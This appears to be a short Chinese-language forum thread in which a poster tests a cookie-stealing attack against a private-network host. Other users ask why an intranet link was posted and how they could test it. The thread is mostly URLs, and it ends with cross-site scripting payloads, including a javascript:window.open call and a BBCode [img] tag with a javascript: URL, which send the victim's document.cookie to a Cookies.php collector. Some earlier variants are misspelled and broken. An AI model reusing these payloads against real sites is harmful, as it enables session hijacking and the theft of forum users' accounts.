http://10.27.6.120/Cookies.php
http://10.27.6.120/Cookies.php
http://10.27.6.120/Cookies.php?msg='+documents.Cookie)
http://10.27.6.120/Cookies.php?msg=+documents.Cookie
你给个内网的连接是什么意思呢?
楼主在testing?
恩 测cookies攻击
http://10.27.6.120/aa.html
http://10.27.6.120/Cookies.php?msg=documents.Cookie
问题是你那是内网地址,我们如何测试?
javascript:window.open('http://10.27.6.120/Cookies.php?msg='+document.Cookie)
http://10.27.6.120/aa.html
[img]javascript:window.open('http://10.27.6.120/Cookies.php?'+document.cookie);[/img]
